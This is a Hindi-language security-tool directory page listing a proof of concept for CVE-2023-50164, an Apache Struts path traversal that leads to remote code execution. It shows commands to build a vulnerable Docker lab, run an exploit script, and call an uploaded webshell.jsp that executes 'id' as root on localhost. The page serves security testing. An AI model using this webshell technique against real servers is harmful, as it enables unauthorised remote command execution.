Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-50164-PoC — CVE-2023-50164 (Apache Struts पाथ ट्रैवर्सल से RCE भेद्यता) - प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/sunnyvale-it/cve-2023-50164-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubsunnyvale-it/cve-2023-50164-poc

CVE-2023-50164-PoC

CVE-2023-50164 (Apache Struts पाथ ट्रैवर्सल से RCE भेद्यता) - प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-50164 (Apache Struts पाथ ट्रैवर्सल से RCE भेद्यता) - प्रूफ ऑफ कॉन्सेप्ट

यह PoC Apache Struts2 भेद्यता का शोषण करके RCE (रिमोट कोड एक्ज़ीक्यूशन) का परीक्षण करने के लिए बनाया गया है।

इमेज बनाएं और एक कंटेनर चलाएं:

root@kitploit:~
$ DOCKER_BUILDKIT=1 docker build  . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc

एक्सप्लॉइट चलाएं:

root@kitploit:~
$ cd exploit
$ ./exploit.sh

अब आप सर्वर साइड पर मनमाने कमांड निष्पादित कर सकते हैं जैसा कि दिखाया गया है:

root@kitploit:~
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a  

uid=0(root) gid=0(root) groups=0(root)

श्रेय

  • भेद्य अनुप्रयोग के उदाहरण के लिए @jakabakos को धन्यवाद (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
  • ऊपर दिए गए आरेख के लिए Zscaler ThreatLabz को धन्यवाद ()
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file
टूल डाउनलोड करें